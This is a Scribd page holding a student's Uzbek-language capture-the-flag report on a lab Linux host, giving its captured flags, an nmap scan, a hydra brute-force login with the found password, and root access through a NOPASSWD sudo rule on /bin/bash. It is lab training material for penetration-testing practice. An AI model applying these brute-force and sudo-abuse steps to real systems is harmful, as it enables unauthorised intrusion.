Scribd
Upload
9 views5 pages

File 1

The report details a security assessment of a Linux server with IP address 192.168.100.100, running Apache httpd 2.4.41 and OpenSSH. User and root flags were discovered, indicating successful exploitation, along with vulnerabilities identified through enumeration and brute force attacks. The report includes steps taken for initial access and privilege escalation to gain root access.

Uploaded by

ibrohimbek200505rid
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
9 views5 pages

File 1

The report details a security assessment of a Linux server with IP address 192.168.100.100, running Apache httpd 2.4.41 and OpenSSH. User and root flags were discovered, indicating successful exploitation, along with vulnerabilities identified through enumeration and brute force attacks. The report includes steps taken for initial access and privilege escalation to gain root access.

Uploaded by

ibrohimbek200505rid
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

FILE1 Report

Umumiy Ma’lumotlar
IP address 192.168.100.100
Operatsion Tizim Nomi (Distribution) Linux

#49-Ubuntu SMP 6.8.0-49-


Operatsion Tizim Kernel Verisyasi
generic PREEMPT_DYNAMIC
Web Server dasturi va Versiyasi Apache httpd 2.4.41
Ochiq Portlar 22, 80

Topilgan Flaglar

💡 Flag ni belgilangan bo’limga nusxa ko’chirib tashlang. Bundan tashqari


flag topilgan ekran screenshotini ham ushbu bo’limga tashlang.

User Flag

💡 User Flag: RED{W4s-th4t-34sy-t0-g3t-m3!-F0ll0w_m3-I-L34d-y0u-


t0-r00t}

[Flag topilgan rasm shu yerga tashalsin]

FILE1 Report 1
Root Flag

💡 Root Flag: RED{Wh4t-I-t0ld-y0u.D0nt-G3t_d1str4ct3d-th3-r3st-1s-


h4rd}

[Flag topilgan rasm shu yerga tashalsin]

FILE1 Report 2
Toplgan Zaifliklar

💡 Har bitta topilgan zaiflikni shu yerda to’ldirib, u haqida batafsil malumot
olish uchun link qoldirasiz. U zaiflik nimalarga saba bo’lishi va qaysi
explit orqali buzilishinni ham shu yerda tushuntirib berishingiz kerak.
Birnchida keltirilgan zaiflik bu sizga misol sifatida keltirilgan. Nechta
zaiflik topa olsangiz barchasini kiriting.

Ushbu CVE x dasturining 2.X.X-


versiyasida mavjud bo’lib,
Exploit linki
hujumchiga X hujumni amalga
berilishi kerak
CVE-XXXX-XXXX oshirishga yordam beradi. Bu
agar mavjud
zaiflik X zailik deb ataladi. Ushu
bo’lsa
havola orqali batafsil o’rganib
chiqish mumkin. [Link qoldirasiz.]

FILE1 Report 3
Hisobot

💡 Har bitta bosqichda qilgan ishlaringizni batafsil, screenshotlar,


foydalanilgan explitlar bilan tushuntirib yozing.

Enumeration (Ma’lumot to’plash)


nmap orqali scan qildim

hermes@neo:~$ nmap -sV --top-ports 1000 192.168.100.100


Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 14:5
Nmap scan report for 192.168.100.100
Host is up (0.000097s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect resu


Nmap done: 1 IP address (1 host up) scanned in 6.50 seconds

Exploitation (Buzib kirish)


hydra orqali bruteforse qildim va parolga erishdim

FILE1 Report 4
Initial Access (Kirish huquqiga erishish)
username dave_admin va paroli cristina

Privilage Escalation (Huquqlarni oshirish)


sudo -l comandasi bilan sudo sifatida nimalarni bajarishimiz mumkinligini bilib
oldim va /bin/bash ishlatishim mumkin ekan va uni ishlatib root huquqini oldim

dave_admin@eca982bb633f:~$ sudo -l
Matching Defaults entries for dave_admin on eca982bb633f:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/

User dave_admin may run the following commands on eca982bb633


(ALL) NOPASSWD: /bin/bash
dave_admin@eca982bb633f:~$ sudo /bin/bash
root@eca982bb633f:/home/dave_admin#

FILE1 Report 5

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy